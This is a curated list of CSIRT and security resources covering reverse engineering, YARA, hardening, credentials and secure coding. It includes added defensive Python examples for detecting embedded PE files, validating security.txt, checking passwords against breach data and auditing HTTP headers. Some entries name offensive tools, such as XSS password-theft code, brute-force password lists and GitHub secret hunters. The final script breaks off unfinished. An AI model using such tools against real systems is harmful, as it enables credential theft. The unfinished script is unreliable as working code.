Reverse Engineering TikTok's VM Obfuscation

CSIRT / Reverse Engineering / Decompilers

decompile_java, using another Java decompiler
NoVmp 1,956 over 3 years ago : A static devirtualizer for VMProtect x64 3.x powered by VTIL
Awesome IDA, x64DBG & OllyDBG plugins 1,283 6 months ago : A curated list of IDA x64DBG and OllyDBG plugins
edb 2,705 3 months ago is a cross-platform AArch32/x86/x86-64 debugger
Interactive Delphi Reconstructor IDR 968 over 1 year ago : a decompiler of executable files (EXE) and dynamic libraries (DLL), written in Delphi and executed in Windows32 environment
PyInstaller Extractor 2,960 10 days ago

CSIRT / Reverse Engineering / Yara

Yara-Rules 4,178 7 months ago : Repository of yara rules
Repository containing Indicators of Compromise and Yara rules 79 over 3 years ago
YARA in a nutshell
yara 8,300 about 2 months ago : The pattern matching swiss knife
mkYARA : Writing YARA rules for the lazy analyst
Yara-Rules 570 11 months ago : Repository of YARA rules made by McAfee ATR Team
ReversingLabs YARA Rules 768 about 1 month ago
YaraHunts 95 over 1 year ago : Random hunting-oriented YARA rules
YARA Rules for ProcFilter 84 over 7 years ago
ThreatHunting 568 about 1 month ago
yara-validator 39 about 4 years ago : Validates yara rules and tries to repair the broken ones
Vim Syntax Highlighting for YARA Rules 31 9 months ago : A Vim syntax-highlighting file for YARA rules covering YARA 4.0

CSIRT / Reverse Engineering / Yara / Rules DB:

xored_pefile_mini 10 about 2 years ago : detects files with a PE header at uint32(0x3c), xored with a key of 1, 2 or 4 bytes
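The two detections listed above, the Generic Anomalies rule (an executable embedded in a non-executable file) and xored_pefile_mini (a PE header XORed with a 1-, 2- or 4-byte key), both reduce to checking that the uint32 at offset 0x3c of an MZ stub points at a PE\0\0 signature. The script below is an added example written for this list, not code from Signature-Base or xored_pefile_mini; the sample PE image is constructed and the "e_lfanew is below 65536" assumption used to recover the third and fourth key bytes is noted in the code.

```python
"""Added example: find a PE image embedded in another file, and recover the
1/2/4-byte XOR key applied to a PE header (not Signature-Base or
xored_pefile_mini code). Sample data comes from build_fake_pe()."""
import struct

MZ = b"MZ"
PE_SIG = b"PE\0\0"


def xor_bytes(data: bytes, key: bytes, offset: int = 0) -> bytes:
    """XOR `data` with a repeating `key`; `offset` is data's position in the
    whole file so the key phase stays aligned to the file start."""
    return bytes(b ^ key[(offset + i) % len(key)] for i, b in enumerate(data))


def find_embedded_pe(data: bytes, min_offset: int = 1):
    """Return offsets of every plausible PE image embedded in `data`.

    A hit needs the DOS 'MZ' stub, an e_lfanew (uint32 at +0x3c) that points
    past the 0x40-byte DOS header and inside the blob, and 'PE\\0\\0' there.
    min_offset=1 ignores a PE that starts at byte 0, so a plain executable
    does not report itself as "embedded".
    """
    hits = []
    pos = data.find(MZ, min_offset)
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            sig = pos + e_lfanew
            if e_lfanew >= 0x40 and sig + 4 <= len(data) and data[sig:sig + 4] == PE_SIG:
                hits.append(pos)
        pos = data.find(MZ, pos + 1)
    return hits


def xor_key_for_pe_header(data: bytes):
    """Recover the key if `data` is a PE header XORed with a 1/2/4-byte key.

    Key bytes 0 and 1 fall out of the known plaintext 'MZ'. For a 4-byte key,
    e_lfanew sits at 0x3c, which is 4-byte aligned, so its two high bytes
    (assumed zero, i.e. e_lfanew < 65536) yield key bytes 2 and 3. Every
    candidate is confirmed by decoding e_lfanew and checking for 'PE\\0\\0'
    at that offset. Returns the key or None; an all-zero key means the file
    was never obfuscated.
    """
    if len(data) < 0x40:
        return None
    k0, k1 = data[0] ^ MZ[0], data[1] ^ MZ[1]
    candidates = [bytes([k0]), bytes([k0, k1]),
                  bytes([k0, k1, data[0x3E], data[0x3F]])]
    for key in candidates:
        if len(key) == 1 and k0 != k1:      # a 1-byte key must decode both 'M' and 'Z'
            continue
        e_lfanew = struct.unpack("<I", xor_bytes(data[0x3C:0x40], key, offset=0x3C))[0]
        if e_lfanew < 0x40 or e_lfanew + 4 > len(data):
            continue
        if xor_bytes(data[e_lfanew:e_lfanew + 4], key, offset=e_lfanew) == PE_SIG:
            return key
    return None


def build_fake_pe(e_lfanew: int = 0x80, size: int = 0x100) -> bytes:
    """Constructed stand-in for a PE: MZ stub, e_lfanew, PE signature and
    zeros elsewhere. Not a real executable."""
    buf = bytearray(size)
    buf[0:2] = MZ
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = PE_SIG
    return bytes(buf)


if __name__ == "__main__":
    pe = build_fake_pe()
    carrier = b"%PDF-1.4 constructed carrier " + pe      # a "PDF" with a PE inside
    print("embedded PE at offsets", find_embedded_pe(carrier))
    for key in (b"\x00", b"\x5a", b"\x13\x37", b"\xde\xad\xbe\xef"):
        print(key.hex(), "->", xor_key_for_pe_header(xor_bytes(pe, key)))
```

Run it against a real sample by replacing `carrier` with the file contents; an all-zero key from `xor_key_for_pe_header` is the unobfuscated case, and a non-zero key is exactly what the YARA rule would fire on.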

CSIRT / Reverse Engineering / Ghidra

ghidra : is a software reverse engineering (SRE) framework
ghidra-firmware-utils 399 7 months ago : Ghidra utilities for analyzing firmware
dragondance 285 5 months ago : Binary code coverage visualizer plugin for Ghidra
Decompiler Analysis Engine : Welcome to the Decompiler Analysis Engine. It is a complete library for performing automated data-flow analysis on software, starting from the binary executable
Working With Ghidra's P-Code To Identify Vulnerable Function Calls
GhIDA : IDA Pro plugin that integrates the Ghidra decompiler into IDA
Ghidraaas 779 almost 4 years ago : Ghidra as a Service
SVD-Loader for Ghidra : Simplifying bare-metal ARM reverse engineering
GhidraX64Dbg 56 over 3 years ago : Extract annotations from Ghidra into an x32/x64dbg database
Reverse Engineering Go Binaries with Ghidra
Introduction to Reverse Engineering with Ghidra: A Four Session Course
Ghidra Plugin Development for Vulnerability Research - Part-1
AngryGhidra 562 4 months ago : Use angr in Ghidra
Defeating Code Obfuscation with Angr
ghidra2frida : The new bridge between Ghidra and Frida
ghidra-scripts 92 about 1 year ago : A collection of my Ghidra scripts
Reversing Raw Binary Firmware Files in Ghidra
Ghidrathon 698 7 months ago : The FLARE team's open-source extension to add Python 3 scripting to Ghidra
IDA Graph view with outlined function included
G-3PO: A Protocol Droid for Ghidra

CSIRT / Frameworks

Inject code into running Python processes 2,801 about 1 year ago
malspider 418 about 2 years ago : Malspider is a web spidering framework that detects characteristics of web compromises
AIL-framework 1,304 17 days ago : AIL (Analysis Information Leak) framework for analysing potential information leaks from unstructured data sources

CSIRT / Patching

Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did. (CVE-2017-11882)

CSIRT / Hardening

BlueWars : defensive Capture The Flag held at H2HC (pt-br)
CCAT 442 over 1 year ago : Cisco Config Analysis Tool
Ciderpress 48 about 5 years ago : Hardened wordpress installer
debian-cis 765 2 months ago : PCI-DSS compliant Debian 7/8 hardening
Endlessh 7,320 6 months ago : an SSH tarpit
ERNW Repository of Hardening Guides 611 about 3 years ago : This repository contains various hardening guides compiled by ERNW for various purposes
fero 209 about 6 years ago : YubiHSM2-backed signing server
FirewallChecker 101 about 3 years ago : A self-contained firewall checker
Get SSH login notification on Telegram
Hardentools 2,931 8 months ago is a utility that disables a number of risky Windows features
How To Secure A Linux Server 17,554 about 1 month ago : An evolving how-to guide for securing a Linux server
kconfig-hardened-check 1,690 13 days ago : A tool for checking the hardening options in the Linux kernel config
Implementing Least-Privilege Administrative Models
Iptables Essentials 1,483 over 4 years ago : Common Firewall Rules and Commands
Keyringer : encrypted and distributed secret sharing software
Keystone Project (site and GitHub)
linux-hardened 5 over 6 years ago : Minimal supplement to upstream Kernel Self Protection Project changes
List of sites with two factor auth 3,388 8 days ago
nftables : nftables is the successor to iptables. It replaces the existing iptables, ip6tables, arptables and ebtables framework. It uses the Linux kernel and a new userspace utility called nft. nftables provides a compatibility layer for the ip(6)tables framework
Common approaches to securing Linux servers and what runs on them. Nice article with a lot of resources
opmsg 750 over 1 year ago : is a replacement for gpg which can encrypt/sign/verify your mails or create/verify detached signatures of local files. Even though the opmsg output looks similar, the concept is entirely different
prowler 10,839 7 days ago : AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and additional checks. Official CIS for
reconbf 47 about 8 years ago : Recon system hardening scanner
Sarlacc 44 over 6 years ago is an SMTP server that I use in my malware lab to collect spam from infected hosts
Secure & Ad-free Internet Anywhere With Streisand and Pi Hole
Secure Secure Shell
Securing Docker Containers
securityonion-docs 84 6 days ago
security.txt : A proposed standard which allows websites to define security policies
security-txt 1,797 almost 2 years ago : A proposed standard that allows websites to define security policies
Hardenize : see your site's configuration with Hardenize
Set up two-factor authentication for SSH on Fedora
solo-hw 182 almost 5 years ago : Hardware sources for Solo
ssh-auditor 608 11 months ago : The best way to scan for weak ssh passwords on your network
Streisand 23,195 over 3 years ago sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists
The Practical Linux Hardening Guide 9,947 over 4 years ago : 🔥 This guide details the planning and the tools involved in creating a secure Linux production systems - work in progress
tls-what-can-go-wrong 100 almost 6 years ago : TLS - what can go wrong?
upvote 452 about 3 years ago : A multi-platform binary whitelisting solution
Using a Hardened Container Image for Secure Applications in the Cloud
Zero-knowledge attestation
Reverie : An optimized zero-knowledge proof system

CSIRT / Hardening / RHEL Like systems:

CentOS7 Lockdown 73 almost 3 years ago
RHEL7-CIS 30 over 4 years ago : Ansible RHEL 7 - CIS Benchmark Hardening Script
cisecurity 9 over 4 years ago : Configures Linux systems to Center for Internet Security Linux hardening standard

CSIRT / Hardening

bdshemu : The shellcode emulator
IPv6 Security Best Practices
auditd 1,497 about 1 month ago : Best Practice Auditd Configuration
Hardened/PaX Quickstart
tosh 417 over 3 years ago : Imagine your SSH server only listens on an IPv6 address, and where the last 6 digits are changing every 30 seconds as a TOTP code

CSIRT / Hardening / Kubernetes:

9 Kubernetes Security Best Practices Everyone Must Follow
Kubernetes Hardening Guidance NSA/CISA

CSIRT / Hardening

CHAPS 173 7 months ago : Configuration Hardening Assessment PowerShell Script (CHAPS)
Awesome Windows Domain Hardening 1,749 almost 5 years ago : A curated list of awesome Security Hardening techniques for Windows
Learn and Test DMARC : Visualizing the communication between email servers will help you understand what SPF, DKIM, and DMARC do and how these mechanisms work
VideoLan Robots.txt
ssh & linux cheat sheets
ssh-audit 3,417 about 1 month ago : SSH server & client auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc)

CSIRT / Hardening / WebServers / A lot of good posts by geek flare:

How to Configure SSL Certificate on Google Cloud Load Balancer?
Nginx Web Server Security & Hardening Guide
IBM HTTP Server Security & Hardening Guide
Apache Tomcat Hardening and Security Guide
How to Enable TLS 1.3 in Nginx, Cloudflare?
Apache Web Server Hardening & Security Guide (link broken)

CSIRT / Hardening / WebServers / CaCerts

List of free RFC 3161 timestamp authority (TSA) servers
certstream-server 271 8 months ago : Certificate Transparency Log aggregation, parsing, and streaming service written in Elixir

CSIRT / Hardening / WebServers / Apache:

Apache Security
dotdotslash 418 5 months ago : An tool to help you search for Directory Traversal Vulnerabilities
A new security header: Feature Policy
How do I prevent apache from serving the .git directory?

CSIRT / Hardening / WebServers / Nginx:

20 Essential Things to Know if You’re on Nginx Web Server
Nginx C function : Create your desired C application on top of nginx module
NGINX config for SSL with Let's Encrypt certs
How to Configure an Nginx SSL Certificate Chain

CSIRT / Hardening / WebServers / PHP:

Cheatsheet for finding vulnerable PHP code using grep 346 over 6 years ago : This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function
It's All About Time : a tool for performing feasibility analyses of timing attacks; also linked, a tool for performing network timing attacks on plaintext and hashed password authentication
snuffleupagus 26 about 1 year ago : Security module for php7 - Killing bugclasses and virtual-patching the rest!
FOPO-PHP-Deobfuscator 86 over 7 years ago : A simple script to deobfuscate PHP file obfuscated with FOPO Obfuscator
Decode.Tools : Decode PHP Obfuscator by FOPO

CSIRT / Hardening / WebServers / Ruby:

TSS - Threshold Secret Sharing 23 over 3 years ago : A Ruby implementation of Threshold Secret Sharing (Shamir) as defined in IETF Internet-Draft draft-mcgrew-tss-03.txt

CSIRT / Hardening / WebServers

IT Security Guidelines for Transport Layer Security (TLS)
CAA Mandated by CA/Browser Forum
ENVOY is an open source edge and service proxy, designed for cloud-native applications
ghp 262 almost 6 years ago : A simple web server for serving static GitHub Pages locally
LEAR 168 almost 6 years ago : Linux Engine for Asset Retrieval
NFHTTP 588 over 1 year ago : A cross platform C++ HTTP library that interfaces natively to other platforms
Security/Server Side TLS by Mozilla
urlscan.io : A sandbox for the web
QUIC's combined transport and cryptographic handshake lets it complete one round trip faster than TCP + TLS; the post also covers its main problems
Secure Headers 3,164 11 days ago : Manages application of security headers with many safe defaults
HTTP/2: The Sequel is Always Worse
A File Format to Aid in Security Vulnerability Disclosure RFC 9116:
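RFC 9116 and the security.txt entries above define a small line-oriented format, and most deployed files fail on the same few points: a missing or stale Expires, a bare e-mail address instead of a mailto: URI, or an http: link. The validator below is an added example written for this list, not code from securitytxt.org or the security-txt project; it implements the RFC's MUST/SHOULD rules for the standard fields (unknown fields are allowed by the RFC and are left alone), and both sample files are constructed.

```python
"""Added example: parse and validate a security.txt file per RFC 9116
(not code from securitytxt.org). Sample files below are constructed."""
import datetime as dt
import re

FIELD_RE = re.compile(r"^([A-Za-z0-9-]+):[ \t]*(.*?)[ \t]*$")
RFC3339_RE = re.compile(
    r"^(\d{4})-(\d{2})-(\d{2})[Tt ](\d{2}):(\d{2}):(\d{2})(?:\.\d+)?([Zz]|[+-]\d{2}:\d{2})$")
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):", re.I)
HTTPS_ONLY = ("canonical", "encryption", "acknowledgments", "policy", "hiring")


def parse_rfc3339(value: str) -> dt.datetime:
    """Strict RFC 3339 parse returning a timezone-aware datetime."""
    m = RFC3339_RE.match(value)
    if not m:
        raise ValueError(f"not RFC 3339: {value!r}")
    y, mo, d, h, mi, s = (int(x) for x in m.groups()[:6])
    tz = m.group(7)
    if tz.upper() == "Z":
        offset = dt.timedelta(0)
    else:
        sign = 1 if tz[0] == "+" else -1
        offset = sign * dt.timedelta(hours=int(tz[1:3]), minutes=int(tz[4:6]))
    return dt.datetime(y, mo, d, h, mi, s, tzinfo=dt.timezone(offset))


def parse_security_txt(text: str):
    """Return ({field_name_lower: [values...]}, [malformed lines]).
    '#' lines are comments; field names are case-insensitive."""
    fields, malformed = {}, []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = FIELD_RE.match(line)
        if m is None:
            malformed.append(line)
            continue
        fields.setdefault(m.group(1).lower(), []).append(m.group(2))
    return fields, malformed


def validate_security_txt(text: str, now: dt.datetime = None):
    """Return a list of problems; an empty list means the file is acceptable."""
    now = now or dt.datetime.now(dt.timezone.utc)
    fields, malformed = parse_security_txt(text)
    problems = [f"malformed line: {line!r}" for line in malformed]
    for name in ("contact", "expires"):            # both MUST be present
        if name not in fields:
            problems.append(f"{name}: required field missing")
    for name in ("expires", "preferred-languages"):  # MUST NOT repeat
        if len(fields.get(name, [])) > 1:
            problems.append(f"{name}: must appear only once")
    for uri in fields.get("contact", []):          # URI; web URIs MUST be https
        m = SCHEME_RE.match(uri)
        if m is None:
            problems.append(f"contact: not a URI (use mailto:, tel: or https:): {uri!r}")
        elif m.group(1).lower() == "http":
            problems.append(f"contact: web URIs must use https: {uri!r}")
    for name in HTTPS_ONLY:
        for uri in fields.get(name, []):
            if not uri.lower().startswith("https://"):
                problems.append(f"{name}: must be an https: URL: {uri!r}")
    if len(fields.get("expires", [])) == 1:
        try:
            expires = parse_rfc3339(fields["expires"][0])
        except ValueError:
            problems.append("expires: not an RFC 3339 timestamp")
        else:
            if expires <= now:
                problems.append("expires: file has expired")
            elif expires - now > dt.timedelta(days=365):
                problems.append("expires: more than a year away (RFC 9116 recommends less)")
    return problems


# Constructed samples, not any real organisation's files.
GOOD = """# constructed example
Contact: mailto:security@example.com
Contact: https://example.com/security/report
Expires: 2031-12-31T23:59:00Z
Encryption: https://example.com/pgp-key.txt
Preferred-Languages: en, pt-BR
Canonical: https://example.com/.well-known/security.txt
"""
BAD = """Contact: security@example.com
Expires: 2020-01-01T00:00:00Z
Expires: 2020-01-02T00:00:00Z
Policy: http://example.com/disclosure
"""
EXAMPLE_NOW = dt.datetime(2031, 6, 1, tzinfo=dt.timezone.utc)  # fixed clock for the demo

if __name__ == "__main__":
    for label, body in (("GOOD", GOOD), ("BAD", BAD)):
        print(label, validate_security_txt(body, EXAMPLE_NOW) or "ok")
```

The file must be fetched from /.well-known/security.txt over HTTPS; that transport check is outside this parser, which only judges the content.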

CSIRT / Credentials

WhiteIntel : WhiteIntel assists companies in identifying compromised credentials through malware campaigns
Cr3dOv3r 2,025 about 1 month ago : Search if your credentials were leaked
pw-pwnage-cfworker 154 over 2 years ago : Deploy a Cloudflare Worker to sanely score users' new passwords with zxcvbn AND check for matches against haveibeenpwned's 5.1+ billion breached accounts
XSS Exploit code for retrieving passwords stored in a Password Vault
login_duress 108 3 months ago : A BSD authentication module for duress passwords
XSStrike 13,378 4 months ago : Most advanced XSS detection suite
Was my password leaked? : Search for credentials leaked on pwndb
bitwarden_rs 39,076 7 days ago : Unofficial Bitwarden compatible server written in Rust
pcfg_cracker 321 4 months ago : Probabilistic Context Free Grammar (PCFG) password guess generator
Depix 26,007 3 months ago : Recovers passwords from pixelized screenshots
pwndb 1,306 over 3 years ago : Search for leaked credentials
Password Lists 319 6 months ago : Password lists with top passwords to optimize bruteforce attacks
awesome-keepass 429 4 months ago : Curated list of KeePass-related projects
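The pw-pwnage-cfworker entry above checks new passwords against Have I Been Pwned without ever sending the password: the client hashes it with SHA-1, sends only the first five hex characters, receives every suffix in that bucket and matches locally (the range, or k-anonymity, API). The script below is an added example in Python, not the worker's code; the breach corpus in `CONSTRUCTED_CORPUS` and its counts are made up so the protocol can be exercised offline, and `fetch_range_online` is the real lookup.

```python
"""Added example: Have I Been Pwned range (k-anonymity) check, offline-capable.
Not code from pw-pwnage-cfworker. The breach corpus below is constructed."""
import hashlib
import urllib.request

RANGE_URL = "https://api.pwnedpasswords.com/range/"


def sha1_prefix_suffix(password: str):
    """Split the uppercase hex SHA-1 into the 5-char prefix that is sent and
    the 35-char suffix that never leaves the client."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def count_in_range(suffix: str, range_body: str) -> int:
    """Parse a range response ('SUFFIX:COUNT' per line) and return the count
    for our suffix, or 0. Padded entries (Add-Padding: true) carry count 0."""
    for line in range_body.splitlines():
        line = line.strip()
        if not line:
            continue
        candidate, _, count = line.partition(":")
        if candidate.upper() == suffix:
            return int(count or 0)
    return 0


def fetch_range_online(prefix: str) -> str:
    """Real lookup. Add-Padding asks the service to pad the bucket so the
    response size does not reveal which bucket was requested."""
    req = urllib.request.Request(
        RANGE_URL + prefix,
        headers={"Add-Padding": "true", "User-Agent": "awesome-csirt-example"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def breach_count(password: str, fetch_range=None) -> int:
    """Times `password` appears in the corpus (0 = never seen). fetch_range is
    injectable so the check can run against an offline stand-in."""
    fetch_range = fetch_range or fetch_range_online
    prefix, suffix = sha1_prefix_suffix(password)
    return count_in_range(suffix, fetch_range(prefix))


def constructed_range_server(corpus: dict):
    """Offline stand-in for the range endpoint built from a constructed
    {password: count} corpus; returns a fetch_range(prefix) callable."""
    buckets = {}
    for pw, count in corpus.items():
        prefix, suffix = sha1_prefix_suffix(pw)
        buckets.setdefault(prefix, []).append(f"{suffix}:{count}")
    return lambda prefix: "\r\n".join(buckets.get(prefix, []))


def acceptable_new_password(password: str, fetch_range=None, min_len: int = 12) -> tuple:
    """Signup/reset policy: long enough and never seen in breach data."""
    if len(password) < min_len:
        return False, f"shorter than {min_len} characters"
    n = breach_count(password, fetch_range)
    if n:
        return False, f"seen {n} times in breach data"
    return True, "ok"


# Constructed corpus with made-up counts; the real service holds hundreds of millions.
CONSTRUCTED_CORPUS = {"password": 3861493, "letmein": 238000, "Summer2024!!": 7}

if __name__ == "__main__":
    fetch = constructed_range_server(CONSTRUCTED_CORPUS)
    for pw in ("password", "Summer2024!!", "correct horse battery staple"):
        print(repr(pw), acceptable_new_password(pw, fetch, min_len=8))
```

Pass no `fetch_range` to query the live service; a non-zero count is a hard reject, and the zxcvbn strength score the worker adds on top is a separate, local computation.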

CSIRT / Credentials / awesome-keepass

KeePassium 1,201 7 days ago : KeePass-compatible password manager for iOS
Launch PowerShell Script From Within KeePass And Include Password Secure String Credential
libkeepass 103 about 4 years ago : Python module to read KeePass 1.x/KeePassX (v3) and KeePass 2.x (v4) files
KeepassXC-Pwned 35 28 days ago : Check your keepassxc database against previously breached haveibeenpwned passwords

CSIRT / Credentials / Tokens

Use YubiKey security key to sign into AWS Management Console with YubiKey for multi-factor authentication
Introducing the Qubes U2F Proxy
YubiKey-Guide 11,198 19 days ago : Guide to using YubiKey for GPG and SSH; a practical guide to using YubiKey as a SmartCard for storing GPG encryption and signing keys
Using a Yubikey for GPG and SSH : Sebastian Neef - 0day.work
PIN and Management Key
Improve login security with challenge-response authentication
URU Card : Arduino FIDO2 Authenticator
YubiKey at Datadog 495 10 months ago
yubikey-ssh-setup 3,243 about 1 month ago

CSIRT / Secure Programming

Hardening C/C++ Programs Part II: Executable-Space Protection and ASLR
Checklist of the most important security countermeasures when designing, testing, and releasing your API 22,480 7 days ago
sanitizers 11,517 20 days ago
Gitian is a secure source-control oriented software distribution method
Canary 30 over 5 years ago : Input Detection and Response
Canarytokens by Thinkst
CANARY FILES: GENERATING FAKE FILES TO DETECT CRITICAL DATA LOSS FROM COMPLEX COMPUTER NETWORKS
How to Know if Someone Access your Files with Canary Tokens
Wycheproof 2,787 3 months ago : Project Wycheproof tests crypto libraries against known attacks
Web App Security 101 : Keep Calm and Do Threat Modeling

CSIRT / Secure Programming / SSL/TLS for dummies:

part 1 : Ciphersuite, Hashing, Encryption;
part 2 : Understanding key exchange algorithm;
part 3 : Understanding Certificate Authority

CSIRT / Secure Programming

heaphopper 212 about 2 months ago : HeapHopper is a bounded model checking framework for Heap-implementations
Ristretto is a technique for constructing prime order elliptic curve groups with non-malleable encodings
SEI CERT C Coding Standard : The C rules and recommendations in this wiki are a work in progress and reflect the current thinking of the secure coding community. Because this is a development website, many pages are incomplete or contain errors. As rules and recommendations mature, they are published in report or book form as official releases. These releases are issued as dictated by the needs and interests of the secure software development community

CSIRT / Secure Programming / SEI CERT C Coding Standard

MSC24-C. Do not use deprecated or obsolescent functions
US-CERT: memcpy_s() and memmove_s()

CSIRT / Secure Programming

Safe C Library 13 over 9 years ago : The Safe C Library provides bound checking memory and string functions per ISO/IEC TR24731. These functions are alternative functions to the existing standard C library that promote safer, more secure programming
Field Experience With Annex K — Bounds Checking Interfaces
TSLint 5,906 over 3 years ago : An extensible linter for the TypeScript language
rubocop 12,650 5 days ago : A Ruby static code analyzer and formatter, based on the community Ruby style guide
Librando : transparent code randomization for just-in-time compilers
Checked C : Making C Safe by Extension
Practical case: Buffer Overflow 0x01
pigaios 635 almost 2 years ago : A tool for diffing source codes directly against binaries
A Git Horror Story : Repository Integrity With Signed Commits. How to use git securely (signing commits)
An Introduction to Dynamic Symbolic Execution and the KLEE Infrastructure
Tooling for verification of PGP signed commits 79,540 7 days ago
tlse 545 about 1 month ago : Single C file TLS 1.2/1.3 implementation, using tomcrypt as crypto library
tinyalloc 778 4 months ago : malloc / free replacement for unmanaged, linear memory situations (e.g. WASM, embedded devices...)
Sandboxed API 1,667 7 days ago : Sandboxed API automatically generates sandboxes for C/C++ libraries
HACL* 1,627 9 days ago : a formally verified cryptographic library written in F*
Villoc 602 over 4 years ago : Villoc is a heap visualisation tool, it's a python script that renders a static html file
How C array sizes become part of the binary interface of a library
MazuCC 516 about 4 years ago : A minimalist C compiler with x86_64 code generation
When the going gets tough : Understanding the challenges with Product commoditization in SCA
huskyCI 576 6 months ago : huskyCI is an open source tool that performs security tests inside CI pipelines of multiple projects and centralizes all results into a database for further analysis and metrics
GTER 47 | GTS 33 - Day 2 (part 1) (pt-br) : nice talk by Daniel Carlier and Silvia Pimpão
HTTP Security Headers A Complete Guide
SAFECode : is a non-profit organization exclusively dedicated to increasing trust in information and communications technology products and services through the advancement of effective software assurance methods
Security Code Review 101
Elliptic Curve Cryptography Explained
Cheatsheet for finding vulnerable PHP code using grep 346 over 6 years ago : This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function
How to Process Passwords as a Software Developer
QL 7,701 4 days ago : The libraries and queries that power CodeQL and LGTM.com
Sendy is Insecure : How Not to Implement reCAPTCHA
Cheating in Elliptic Curve Billiards 2 : Windows 10 crypto vulnerability
DevSecOps : Securing Software in a DevOps World
GitGuardian Documentation and Resources 1,917 over 5 years ago : Resources to help you keep secrets (API keys, database credentials, certificates, ...) out of source code and remediate the issue in case of a leaked API key. Made available by GitGuardian
Vuln Cost - Security Scanner for VS Code 202 over 2 years ago : Find security vulnerabilities in open source npm packages while you code
Most Popular Analysis Tools by Programming Language
Deepsource : tool that analyzes your repository
git-wild-hunt 292 almost 2 years ago : A tool to hunt for credentials in github wild AKA git*hunt
shhgit 3,839 about 1 year ago : Find GitHub secrets in real time
A Graduate Course in Applied Cryptography
KaiMonkey 96 11 months ago : Vulnerable Terraform Infrastructure. KaiMonkey provides example vulnerable infrastructure to help cloud security, DevSecOps and DevOps teams explore and understand common cloud security threats exposed via infrastructure as code
You don’t need reproducible builds.
Comments on build reproducibility
DevSecOps : Integrating Security in the Development Pipeline
SLSA 1,555 4 days ago : Supply-chain Levels for Software Artifacts, Proposal
DazedAndConfused is a tool to help determine dependency confusion exposure
Security Scorecards 4,600 4 days ago : Security health metrics for Open Source
kcare-uchecker 184 9 months ago : A simple tool to detect outdated shared libraries
Package Hunter : A tool for identifying malicious dependencies via runtime monitoring
What science can tell us about C and C++'s security
Awesome AppSec 6,329 5 months ago : A curated list of resources for learning about application security
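The HTTP security-headers guide above (and the Secure Headers and Feature Policy entries in the web-server section) all describe the same baseline: HSTS with a long max-age and includeSubDomains, a CSP without 'unsafe-inline' scripts and with object-src and frame-ancestors locked down, nosniff, a strict Referrer-Policy, Permissions-Policy (the successor of Feature-Policy) and no version strings in Server or X-Powered-By. The checker below is an added example, not code from secure_headers or the guide; the one-year HSTS threshold and the exact finding strings are assumptions, and both header sets are constructed.

```python
"""Added example: audit a response's security headers against the common
baseline (not secure_headers code). Thresholds are assumptions; the WEAK and
HARDENED header sets are constructed."""
import re

STRICT_REFERRER = {"no-referrer", "same-origin", "strict-origin", "strict-origin-when-cross-origin"}
ONE_YEAR = 31536000


def parse_csp(value: str):
    """\"default-src 'self'; script-src 'self' 'nonce-x'\" -> {directive: [sources]}"""
    policy = {}
    for directive in value.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def audit_headers(headers: dict):
    """Return a list of findings; an empty list means the baseline is met."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    findings = []

    hsts = h.get("strict-transport-security", "")
    if not hsts:
        findings.append("HSTS missing")
    else:
        m = re.search(r"max-age=(\d+)", hsts, re.I)
        if not m or int(m.group(1)) < ONE_YEAR:
            findings.append("HSTS max-age below one year")
        if "includesubdomains" not in hsts.lower():
            findings.append("HSTS lacks includeSubDomains")

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff missing")

    csp = parse_csp(h.get("content-security-policy", ""))
    if not csp:
        findings.append("Content-Security-Policy missing")
    else:
        if "default-src" not in csp:
            findings.append("CSP has no default-src fallback")
        # script-src falls back to default-src; a nonce/hash source makes
        # browsers ignore 'unsafe-inline', so only flag it when neither exists
        scripts = csp.get("script-src", csp.get("default-src", []))
        nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in scripts)
        if "'unsafe-inline'" in scripts and not nonce_or_hash:
            findings.append("CSP allows 'unsafe-inline' scripts")
        if "object-src" not in csp and "'none'" not in csp.get("default-src", []):
            findings.append("CSP leaves object-src open (plugins)")

    if "frame-ancestors" not in csp and h.get("x-frame-options", "").upper() not in ("DENY", "SAMEORIGIN"):
        findings.append("no clickjacking protection (frame-ancestors or X-Frame-Options)")

    if h.get("referrer-policy", "").lower() not in STRICT_REFERRER:
        findings.append("Referrer-Policy missing or leaky")

    if "permissions-policy" not in h:
        findings.append("Permissions-Policy missing (Feature-Policy is its deprecated predecessor)")

    for name in ("server", "x-powered-by"):
        if re.search(r"\d", h.get(name, "")):     # a digit almost always means a version
            findings.append(f"{name} header leaks a version string")
    return findings


# Constructed header sets: a typical default install and a hardened one.
WEAK_HEADERS = {
    "Server": "Apache/2.4.29 (Ubuntu)",
    "X-Powered-By": "PHP/7.2.24",
    "Strict-Transport-Security": "max-age=300",
    "Content-Security-Policy": "default-src 'self' 'unsafe-inline'",
    "Referrer-Policy": "unsafe-url",
}
HARDENED_HEADERS = {
    "Server": "nginx",
    "Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload",
    "Content-Security-Policy": "default-src 'self'; script-src 'self' 'nonce-r4nd0m'; "
                               "object-src 'none'; frame-ancestors 'none'; base-uri 'self'",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Permissions-Policy": "camera=(), microphone=(), geolocation=()",
}

if __name__ == "__main__":
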